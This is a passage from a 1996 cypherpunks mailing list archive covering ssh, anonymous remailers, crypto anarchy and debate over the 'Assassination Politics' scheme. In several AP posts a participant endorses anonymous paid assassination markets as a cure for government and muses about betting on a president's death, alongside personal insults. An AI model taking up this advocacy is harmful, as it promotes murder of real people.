#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 27 Sep 1996 08:44:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <199609262012.NAA14242@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960926173412.22273F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Sep 1996, jim bell wrote:

> At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote:
> >On 26 Sep 96 at 10:49, Brian Davis wrote:
> >
> >> If by "operation effectiveness" you mean some people will be killed,
> >> I agree.  I also agree with the fire/water comment (maybe in more
> >> ways than one!); my comment related to my belief that AP-supporters
> >> shouldn't complain about especially draconian measures taken against
> >> them by governments, given their modus operandi.
> >
> >I don't think that any of them will complain because they understand 
> >the nature of it.  I think that Jim Bell (forgive me Jim...:) view 
> >that there will be only limited retaliation from government is not 
> >guaranteed at all.  As I said somewhere previously, the whole thing 
> >will depend on how the authorities view AP as (non-) attackable.  
> >
> >Here is the post I wrote earlier:
> >
> >------- earlier post -------
> >
> >jim bell recently wrote:
> >
> >> Local police action against an AP organization would, of course, be
> >> deterred by the prospect of naming anybody who would go after it,
> >> and soliciting donations against them.  
> >
> >I don't agree here.  It would all be a matter of timing, unless the
> >number of AP servers would be sprouting out faster than police forces
> >would be able to destroy them.  You have to realize that if the money
> >is seized, noboby will be willing to make a hit since the odds of
> >being paid are not too good.  Just play the game "Command and Conquer"
> >for a while and you'll see.  Money is fuel.  Don't run off of it!
> 
> Uh, okay, I didn't mean to suggest that attacks would be entirely 
> eliminated.  (The term "deterred" really needed to be quantified there, even 
> for a native English speaker.)
> 
> But my main point was that (as evidenced by Brian Davis' unwillingness to 
> acknowledge that the people who run the system will engage in illegality to 
> stop AP) there is a certain hesitancy on the part of the "ruling class" to 
> abandon at least the facade of legality that they often promote.  


You have misinterpreted me or I was unclear.  I don't doubt that, at some 
point, the group of people who generally follow the rule of written law 
might skip over some of the more restrictive parts of that law to combat 
incessant violence.  That is what I meant by "especially draconian 
measures"; I know you agree that such a response is logical and proper 
under the circumstances.  :-)

EBD


> 
> >
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 27 Sep 1996 08:37:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: ssh - How widely used?
Message-ID: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know if there are MS-Dos or Mac versions of the ssh client?
How much is ssh used?

I've not seen much discussion of it but poking around an ISP yielded this:

       Ssh  (Secure  Shell)  a  program for logging into a remote
       machine and for executing commands in  a  remote  machine.
       It  is  intended  to  replace  rlogin and rsh, and provide
       secure  encrypted  communications  between  two  untrusted
       hosts over an insecure network.  X11 connections and arbi-
       trary TCP/IP ports can also be forwarded over  the  secure
       channel.

and

Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -a          Disable authentication agent forwarding.
  -x          Disable X11 connection forwarding.
  -i file     Identity for RSA authentication (default: ~/.ssh/identity).
  -t          Tty; allocate a tty even if command is given.
  -v          Verbose; display verbose debugging messages.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm: ``idea'' (default, secure),
              ``des'', ``3des'', ``tss'', ``arcfour'' (fast, suitable for
bulk
              transfers), ``none'' (no encryption - for debugging only).
  -p port     Connect to this port.  Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and
              forward them to the other side by connecting to host:port.
  -C          Enable compression.
  -o 'option' Process the option as if it was read from a configuration
file.


Looks like a nice little implementation.

Comments anyone?

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 28 Sep 1996 10:10:40 +0800
To: cypherpunks@toad.com
Subject: Possible subs attack????
Message-ID: <843834821.2722.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>     whose list is this, and why am I on it? Please delete my name
>   now.  


I have noticed a lot of these messages on the list over the last day
or two, I can only assume Vilus/Detweiller/Some other troublemaker 
has decided to subscribe a few people using fake return addresses, 
anyone else got any ideas on what else could have caused people to be 
subscribed?


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 10:19:49 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Public Schools
In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com>
Message-ID: <199609262259.RAA00119@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> 
> On Sun, 22 Sep 1996, snow wrote:
> >I would agree that parents can do as good or better at _most_ 
> >subjects thru about the 3rd or 4th grade, and I do agree that 
> >most of todays schools are shit, however there is one area--
> >social skills--that homeschooling simply can't compete. 
> 
> >From John Holt's "Teach Your Own"
> 
> "If there were no other reason to homeschool your children, protecting them
> from the 'valuable social atmosphere' of the schools would be sufficient."  
> John was a commie liberal BTW.  He felt that the schools had a very nasty
> and artificial social environment with rigid age segregation that bore no
> resemblance to real life where there are people of wider age ranges.
> Certainly, most people suffer worse mistreatment from their "peers" at
> school than they do later in life.     
> As a libertarian, I would add that the social atmosphere of a Stalinist
> "brain factory" is not exactly the socialization I would choose for my
> children.  I would choose a more market oriented model.

     As I indicated (or at least tried to) I am not satisfied with the
way that schools are run. I _don't_ think that this seperation into classes
by age is a good idea, I don't believe that self esteem is more important
than learning. 

     However I DO believe that socialization is necessary. I do believe that
the torture we all endured (and I as much or more than most) from our 
fellow students helps us later in life. If nothing else it teaches us that
our fellow "humans" are not "humane". 

     I think a more more market oriented model would be a good idea, assuming
that you mean a model designed to produce a product--well educated young 
adults--and not simply "worker factories". 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Fri, 27 Sep 1996 03:30:24 +0800
To: cypherpunks@toad.com
Subject: German ICTF stopped blocking xs4all. Radikal back online
Message-ID: <199609261608.SAA24058@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

On the evening of september 24th ICTF stopped blocking xs4all after we
removed the pages. More information about that can be found at
http://www.anwalt.de/ictf (although not much).

Today we've put the radikal back on xs4all :)

For more background information http://www.xs4all.nl/~felipe/germany.html

henk (SPG)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Sep 1996 08:42:47 +0800
To: cypherpunks@toad.com
Subject: Kid gets suspended for bomb info
Message-ID: <v0300785fae70aed26e5e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


I'm sitting here, listening to National People's Radio, and they have this
bit about a local kid who showed up in school today with 40 pages of bomb
making info, "gotten off of the internet". He was "caught" when he showed
his haul to his buddies.

Much gnashing of teeth and flying of fur ensued, and the kid was sent home.


More fun with numbers.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Fri, 27 Sep 1996 09:57:34 +0800
To: cypherpunks@toad.com
Subject: Re: Weaknesses in Smart Cards? (Re: FLA_wed)
In-Reply-To: <ae6ffc4f0b02100486bd@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960926181816.1450A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Sep 1996, Timothy C. May wrote:

[... much deleted but boiling down to: ]

> Not a good journalistic trend, in my opinion.

Yah, but since 40-bit cyphers is seen by the "media" as something most
people don't use, but "smart cards" are just another type of
fraud-resistant credit card being used by Everyone Already, of course,
they have to start a stampede now.

I wonder if this isn't just plain Fear, Uncertainty, and Doubt rearing
its ugly head... does Lucent (they were the ones, right?) have a competing
product?

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 27 Sep 1996 09:06:33 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Lexis and Privacy - Bill approaches.
In-Reply-To: <Pine.GSO.3.95.960925185705.17207A-100000@well.com>
Message-ID: <Pine.BSF.3.91.960926181908.22273T-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Declan McCullagh wrote:

> Dear PhneCards,
> 
> Please stop using my email address as part of an inappropriate email
> bomb. If this continues, I will be forced to persecute your return
> email address.
> 
> Now we don't want that to happen, do we?
> 
> -Declan
> On Wed, 25 Sep 1996 PhneCards@aol.com wrote:
> 
> > 
> > Did you know this company is using your email address as part of
> > an unlawful email bomb?
> > 
> > I would advise you to write to them at cypherpunks@toad.com
> > and owner-cypherpunks@toad.com and advise them to stop
> > using your email address for this type of activity.
> > 
> > It is illegal to use a invalid return email address.  If this continues, I
> > will
> > be forced to prosecute the return email address - which they are
> > making to look like you.


I got a similar message from those idiots and replied off list (part of 
my email bomb, I guess).  There email is terrific -- save it for 
evidence.  They *admit* that they know you aren't doing what they are 
complaining about, but threaten to sue you anyway.

I hope there lawyers have read Civil Rule 11 ... on second thought, I 
hope they haven't!$$$$$!

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 27 Sep 1996 12:48:53 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <ae6ca7190a021004d21c@[207.167.93.63]>
Message-ID: <v03007804ae70ea3223f2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


>Mr. May wrote:
>> At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:
>> >like Markof are somewhat more responsible. This is not going to stop me
>> >from producing an op-ed piece linkiing the net libertarians to assasination
>> >politics unless I hear a few more repudiations of Bell's ideas. If you
>> >don't very clearly reject his murderous ideas you are going to regret it
>> >just as the left regreted having the USSR or the RAF associated with them.
>> I for one don't respond well to extortion threats, so write your damned
>>article.
>
>    I agree with Mr. May, and I will go so far as you call you a coward and
>a thoroughly lousy human being.

Now, now, let's not overreact. I named this thread, and yet I think even I
was going too far. That is, I was just making the point that Phill's call
for us to write denunciations or he would write an essay linking
libertarians and cypherpunks to AP smacked to me of a kind of extortion.

Any, I had several e-mail exchanges (in private) with Phill on this
subject, and I hardly think he's a "thoroughly lousy human being."

I disagree with many of his political beliefs, he no doubt disagrees with
many of mine (and even "ours," collectively), and in this particular case,
his "extortion" was a mistake.

I say we move on.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 10:56:42 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: possible solution to cyber S/N
In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com>
Message-ID: <199609262329.SAA00222@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Nuri wrote:
> in the scientific arena. a paper that is pivotal and influential
> is referred to ad infinitum. obscure papers are forgotten and
> never referred to in subsequent literature.
> taking this idea to the cyberspace arena, the application is
> immediately obvious-- pages that are linked to by a lot of 
> other pages are valuable, those that are not are not as
> valuable.

     I'd bet that there are more links to playboy.com or "xxx.sex.com"
than to thomas.loc.gov. 

     This suffers from the fatal flaw of democracy, the assumption that
one million people are smarter than 10. 

     Who was it that said "No one ever went broke underestimating the
intelligence of the average american"?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 15:06:16 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu>
Message-ID: <199609262349.SAA00297@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Hallium said:
> 	Troops are in Northern Ireland for a very simple and depressing
> reason. People like Jim want to impose their will on others by force.
> Despite prolonged attempts by each faction to assasinate the leaders of
> the other they have been unsuccessful. If terrorists trained by Lybia
> and Syria are unable to assasinate at will then we can be sure thaqt Jim's
> band of kooks is not going to get any further.

     That is your problem. You can't seem to get away from the thought that
somebody is trying to rule. You assume that Mr. Bell wants to be 
President and Supreme Dictator of the World. 

     Remeber your introduction to formal logic? It is A or NOT A, not 
A or B. NOT A _can_ be B, but it can also be anything BUT A. What Mr. Bell
wants, and I agree with is that NOT A. We don't want B, C, D, or any thing 
else, other than NOT A. 

     I remember this set of lines from an anarchist "newspaper" from the 
80's:
     Q: What are you going to replace the government with after you get 
        rid of it?
     A: Do you replace a cancer when you remove it?

     We don't want to remove a leg, we want to cut out a cancer. Consider 
AP extreme chemiotherapy. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 27 Sep 1996 13:17:55 +0800
To: cypherpunks@toad.com
Subject: The Road to Crypto Anarchy
In-Reply-To: <9609261727.AA03280@cti02.citenet.net>
Message-ID: <v03007805ae70ecf2c92a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:51 PM -0700 9/26/96, Declan McCullagh wrote:
>Anonymity and nonescrowed crypto are the linchpins of AP and its more
>general case, Maysian crypto anarchy. The withering of the nation-state.
>Whatever you want to call it.
>
>To prevent it, governments will ban both. A criminal law, passed in the
>wake of say a bombing this fall in Washington, DC, banning nonescrowed
>crypto. (Freeh will assert he has evidence the terrorists used PGPhone.)
>And another law banning online anonymity.
>
>What then, Mr. Bell?
>
Though I'm not Bell, I have some interest in this question.

I believe, and have argued this for at least several years, that we are in
a "race to the fork in the road." The fork in the road being essentially
the point of no return, beyond which things are either pulled strongly to
one end or the other.

The two ends being:

* a surveillance state, with restrictions on cryptography, the spending of
money, the holding of various items (besides just traditional things like
guns and drugs), restrictions on the dissemination of information, and of
course controls on lots of other things.

(For those who think this scenario is ipso facto unconstitutional, look at
the many moves already in this direction. Between Supreme Court decisions
allowing searches and seizures without warrants (e.g., on buses, planes,
etc.), restrictions on discussion of crypto in public places (ITARs), there
are a raft of "Presidential Decision Directives" and "National Security
Decision Directives" which grant the Executive wide powers to seize control
of telecommunications systems, computer networks, emergency systems, etc.
While this is fodder for conspiracy theory supporters, it concerns many
civil liberties advocates as well.)

* a libertarian or anarcho-capitalist state, with people using a variety of
secure and private channels to interact, exchange information, buy and sell
goods and services, and communicate transnationally. The "anarchy" being
the same kind of anarchy seen in so many areas of life: reading choices,
eating choices (except for drug laws), this list, and so on.

(For those who think this scenario is hopelessy rosy, pointing out that
people "can't eat cyberspace," this is surely so. But a large fraction of
"interesting" interactions are already done on the Net, or via phones, or
other such mechanisms. And even if many people are not in cyberspace at
all, if enough of us _are_ and are _secure_, I'll settle for that. The rest
can come later.)

The reason I believe there's a point of no return is this: once, for
example, enough strong, encrypted, black channels are available, it will
essentially be too late to crack down and stop them. Add to the mix
steganographic channels, lots of bandwidth over several mechanism, and it's
too late.

(Take the Digital Telephony Act. It mainly covers _telephones_ (though many
of us have speculated that computer networks could be covered, especially
if Internet telephony catches on in a big way). There is no way the tens of
thousands of individual Linux boxes and whatnot can be made to comply with
DT "wiretappability." The horse is out of the barn on this one, to use yet
another related metaphor.)

Declan is right that each major "incident"--Oklahoma City, TWA 800,
etc.--jumps us forward toward a totalitarian surveillance state. However,
each new anonymous remailer, each new Web site, each new T1 or whatever
link, etc., moves us forward in the direction of crypto anarchy.

On the issue of terrorists, child molestors, and other Horsemen using PGP,
PGPhone, etc., how else could it be? After all, use of PGP is being
promoted by folks like us, and many others, and the molestors, Mafiosos,
money launderers, Palestinian Neo-Intifada (the war that just started this
week) sympathizers, nuclear material smugglers, and other assorted
miscreants (or heroes, depending on one's outlook) are surely thinking
about securing their communications.

So what? After all, as we've been pointing out for years, criminals and
conspirators also have locks on their doors, use curtains on their windows,
keep their voices down when speaking amongst themselves in public, rent
hotel rooms to plot crimes, and generally use various methods to better
ensure privacy and secrecy. And yet the Constitution is pretty clear that
we don't insist windows be uncurtained, conversations be "escrowed," and
locks have keys "escrowed." And so on, with various of the rights
enumerated in the Bill of Rights covering these situations (4th, 1st, etc.).

The inevitable use of strong crypto by some criminal, perhaps even a
heinous one, will be used as an argument to restrict crypto. We have to be
prepared.

Meanwhile, deploy as much crypto stuff as possible.

(When I spoke to Stewart Baker, former chief counsel at the NSA, at the CFP
in early '95, we both knew the race was on. On opposite sides, of course.)

Make no mistake about it,  the faster and more ubiquitously we can deploy
as much strong crypto as possible (e.g., the Gilmore SWAN thing, more
remailers, offshore havens, etc.), the greater the likelihood we'll win.
(And winning will have some rather interesting  consequences for society.)

I think there's currently about an 80% chance we'll win, with maybe a 30%
chance that we've already won, that we've already reached the point of no
return and are on the path to crypto anarchy.

--Tim May

0

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 12:04:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <ae6ca7190a021004d21c@[207.167.93.63]>
Message-ID: <199609270005.TAA00319@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. May wrote:
> At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:
> >like Markof are somewhat more responsible. This is not going to stop me
> >from producing an op-ed piece linkiing the net libertarians to assasination
> >politics unless I hear a few more repudiations of Bell's ideas. If you
> >don't very clearly reject his murderous ideas you are going to regret it
> >just as the left regreted having the USSR or the RAF associated with them.
> I for one don't respond well to extortion threats, so write your damned article.

    I agree with Mr. May, and I will go so far as you call you a coward and
a thoroughly lousy human being. 

    I don't LIKE the idea of AP being necessary, and I am hoping that things
get better before someone get's desperate enough to implement it.

    On the other hand, I like living in a cage of someone elses making. If
I choose to restrict my life, it is mine to restrict. I don't want you to 
have that ability. 

    You obviously come from a family that believes it is Ok to "Rule" people.

    I wrote some fairly hostile shit about you and your family, but that 
is pretty irrelevant to this list, so I disgarded it.

    I will, however, say that you are a bloody fascist peice of work. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 12:30:05 +0800
To: m5@tivoli.com
Subject: Re: Bork book
In-Reply-To: <3247E5B8.6181@tivoli.com>
Message-ID: <199609270016.TAA00338@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Nally wrote:
> Bork came across as kind-of a jerk, personality-wise.

     I listened to him speak on Mr. Limbaugh's show the other day where
the round mound of sound all but blew him on the air. 

     He didn't come across as a jerk to me. More like a facist prick. 

     If he had made it to the Supreme Court, there is no doubt in my 
mind where he would fall on the crypto debate. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johannes Kroeger <jkroeger@squirrel.owl.de>
Date: Fri, 27 Sep 1996 07:45:45 +0800
To: mail2news@anon.lcs.mit.edu
Subject: New alias server weasel.owl.de
Message-ID: <19960926192626.18167.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm running the Squirrel Remailer <mix@squirrel.owl.de> for some
weeks now and finally managed to install a "newnym" style alias
server (like nym.alias.net) with the hostname weasel.owl.de.
Here is the PGP key:

 Type Bits/KeyID    Date       User ID
 pub  2047/B77F2491 1996/09/07 <config@weasel.owl.de>/<send@weasel.owl.de>
 
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6.3ia
 
 mQENAzIxkrUAAAEH/1mg2l5pTFPwdJZp79M3g+aflsoRFd1QIebXktcg2SIcWc+K
 nBU0kHRPx53A3SHnUjtAj9ZOOL9LbmSaR6uwYw3voPnOF7cXsyMlG0dNjkJMzCZM
 UAWAaTB5OcUl2oUrbO+Ceasg94LrDjXCqWf6zxRNgb00SOOopKf+NBtm25wwX1wQ
 LawWkQeLLMhphCLYwbeLqrMexj9eNsKIxmmEHmD5//crkIa8GVlSatdOV3TDxeNv
 GOflltDnGXdGxkAu9ck7Wa7ixQwrTr5IxF5jaxTquUyz+qqni/y1/F4dr7brk7Fz
 VWaqBzlA54Q1oHAM9ptyJKgz+vNFPF2asbd/JJEABRG0Kzxjb25maWdAd2Vhc2Vs
 Lm93bC5kZT4vPHNlbmRAd2Vhc2VsLm93bC5kZT6JARUCBRAyRtqzvA9InihC/mkB
 ASScB/99663wchJb55cyiGkxzIvxF8HULc+PCUxY7Dd/+RF+N5vJlW9tG1cInF3+
 LmMu9iIdEBj7FOnvSh65gGwiIEasVoFLcA4fXzaGC7Nds6OvwzmURbW4GhmDIPTt
 OPzUYc3vlyF3/iExRVL/aomL4aKMgMnRIagPkj2wT0G4YVuVvb6pAQ9Z/qDjgIok
 QEN+yy4NOlwCZQJ4V3TJ/35Fq8dKXkA7eyy4eEK97+VzJOK3ApldEqM71LE7jDtk
 JjbUBmTOfm0NQDbRlEUnfoSyF9yt/MCE7ranSQ2z0hRrw+z6i4XsxAQljPyE1CLD
 YX3nIIUhXumsBwSMPPZ7nfiuNFcaiQEVAgUQMkZ6FzxdmrG3fySRAQF0CAf8CMle
 kOnkwvriif+PdlKnf8rjRtL2H5fk3wg7LmdvpkRzGvJaEtGnToRALEWPujAEY9wg
 YUnDpMiLWkPEVN1cQz690bvzQdyGVb0x4gDsFbivUIuHA55k9c+9cV08tp+4VqB3
 0IQ92p16HfCcLz7Ac+oYPXbLpOceG51mEZLCzu9xeEpk6CbsfQ+GMXXcahqRvJ7Y
 X1dwCwzHG+toPhC9a3+uLggeh72HJW2dI4ExIHYaKhIK5lO874B6G5XEWpdjnqUl
 MXIyoaEtYhUaoeEdBE49jKnyTtuQ8DDy+6xOrOE3F3Sc++8F2zNrY/ZJsLsUb5RG
 EI5u/40s+ASl56KVVw==
 =Ld7v
 -----END PGP PUBLIC KEY BLOCK-----


The following lines should be added to Raph's remailer list:

$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
(weasel squirrel)

Weasel.owl.de has MX records, but no IP address.  You can finger
addresses at squirrel.owl.de when it is connected to the Internet.
My connection for email is via a UUCP link that is polled every
90 minutes, so do not expect quick turnaround of remailed messages.

Please read the help file before using the remailer.  You can get it
by sending mail to <help@weasel.owl.de>.  Reports of problems, bugs,
abuse etc. should be sent to <admin@weasel.owl.de>.

C'punks, please mail questions and comments directly to me, as I'm
not subscribed to the cypherpunks list.

- -- 
Johannes Kroeger		<jkroeger@squirrel.owl.de>
Send me mail with subject "send pgp-key" to get my PGP key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAgUBMkrY3bwPSJ4oQv5pAQGx1ggAxdcMtxQt1K45bijxqPxMQ+ajlIy3TeRB
Y5bxSyr1Q0cTMbKx4ausilrzmaPNLpRU8drMuSk7dbRW4ca9Qs/5kiWhtvIluv70
ex2CgcSjJRLtbq3fEPxcRdOGVU0cxYusS9XP5QJSUJv+nHo5k3qWr7L3Ayk8kKhh
lU4NJ535u+WX4v+/70d6Xk/9NF7JtN9sSfxjK7bY9vszMFtihXRCQ8fFoDKzjy84
Mgl1zOfeAJv7snhWt2k/CBsKRlFNsMCLSBDg9ADOqs9O+40KoY2+lpewRXvFLp4y
VQv4f7wCcbxtnqTgFPeezEWIfO7xBbkhIUIOyETDzo8JeR7EZzEVYw==
=N3Y/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 12:36:24 +0800
To: stewarts@ix.netcom.com
Subject: Re: AP Protocol Failures [NOISE]
In-Reply-To: <199609241701.NAA16848@attrh1.attrh.att.com>
Message-ID: <199609270037.TAA00384@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> >> 	Troops are in Northern Ireland for a very simple and depressing
> >> reason. People like Jim want to impose their will on others by force.
> But AP is great - adding more violence to Ireland is just the thing
> they need........
 
     It wouldn't ADD more violence. 

> One of the strong negatives of AP is that it leads to reverse AP -
> if you don't know _which_ Hatfield killed the latest McCoy, 
> you might as well just shoot one or two Hatfield Boys at random.  
> If you kill off GrandDaddy Hatfield, there's nobody to say 
> "OK, let's stop shooting each other"; instead there's a bunch of 
> angry grandkids, and uncles, _all_ of whom have the
> authority to say "Let's go kill the McCoy bastards who did this!"
> The protocols may work when there's one hierarchical target -
> they don't work with two.  Hammurabi's law about "An eye for an eye
> and a tooth for a tooth" was a _limitation_ on the amount of vengeance
> you were allowed to take, not a minimum required vengeance.

     Putting AP into place doesn't make murder legal. You could still 
be arrested, tried (depending on the jurisdiction) and punished for it. 

     All AP allows is people who don't have the skills necessary to 
do the job pay for it. 

    Wait, that didn't come out right.

    AP simply allows people without the assination skill set to purchase 
access to those skill sets annonymously. There are many, many people out
there who are either too squemish to kill, or are philosophically opposed
to killing. They won't use this system. There are many other without the 
skills nessary to kill higher level targets without getting caught. 

   Without getting caught. That is the key. There is a very good chance 
would AP be implemented that someone might put make a bet on me. I tend 
to piss people off. I am also a slightly harder target than Joe Average.
Not much, because of the neighborhood I live in. Around here you could 
probably buy my death for a $100 bucks worth of crack. 

   Of course, the police will investigate, and since I am white, and not
involved with gangs and drugs, they might even bother to find out who 
wacked me. 

    If someone hits Bill Clinton, then there is a very good chance that
many many people will be wondering who won the bet. While it isn't possbile
(assuming here) to trace the bet side, the assination is an event that takes
place in the real world where physical evidence is considerably difficult 
to obscure.  

     There will be people looking for both killers, but I'd bet that the
people investigating Clintons death would be much more likely to be bet 
against than those investigating mine. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 27 Sep 1996 10:02:27 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <199609270039.TAA05797@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Theres a windows version, mac is under vauge development.  SSH
is pretty cool, but the code base is somewhat messy, and its shows
signs of its origins in things like systems calls not having their
return values checked.

	Despite all this, I use it, like it, and recomend it for use
in systems not likely to come under attack by professionals.

Adam

Black Unicorn wrote:

| Does anyone know if there are MS-Dos or Mac versions of the ssh client?
| How much is ssh used?
| 
| I've not seen much discussion of it but poking around an ISP yielded this:
| 
|        Ssh  (Secure  Shell)  a  program for logging into a remote
|        machine and for executing commands in  a  remote  machine.
|        It  is  intended  to  replace  rlogin and rsh, and provide
|        secure  encrypted  communications  between  two  untrusted
|        hosts over an insecure network.  X11 connections and arbi-
|        trary TCP/IP ports can also be forwarded over  the  secure
|        channel.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 27 Sep 1996 12:49:28 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <v0300782cae70481d711d@[206.119.69.46]>
